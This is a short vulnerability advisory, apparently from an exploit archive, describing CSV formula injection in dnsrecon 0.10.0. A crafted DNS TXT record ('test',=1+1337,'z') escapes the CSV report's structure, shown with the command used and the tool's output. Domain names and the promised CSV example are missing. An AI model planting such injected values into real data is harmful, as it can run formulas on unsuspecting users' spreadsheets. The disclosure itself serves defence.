# Exploit Title: dnsrecon 0.10.0 - CSV Injection  
# Author: Dolev Farhi  
# Date: 2021-01-07  
# Vendor Homepage:  
# Version : 0.10.0  
# Tested on: ParrotOS 4.10  
dnsrecon, when scanning a TXT record such as SPF, i.e.:, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.  
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way: "test',=1+1337,'z"  
user@parrot-virtual:~$ sudo dnsrecon -d -c ./file.csv -n  
[*] Performing General Enumeration of Domain:  
[-] DNSSEC is not configured for  
[*] SOA  
[-] Could not Resolve NS Records for  
[-] Could not Resolve MX Records for  
[*] TXT test',=1+1337,'z  
[*] Enumerating SRV Records  
[+] 0 Records Found  
[*] Saving records to CSV file: ./file.csv  
{'type': 'SOA', 'mname': '', 'address': ''}  
{'type': 'TXT', 'name': '', 'strings': "test',=1+1337,'z"}  
This output will then be rewritten into a CSV with this structure:  
The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464  
Attribute Values  
All printable ASCII characters are permitted in the attribute value.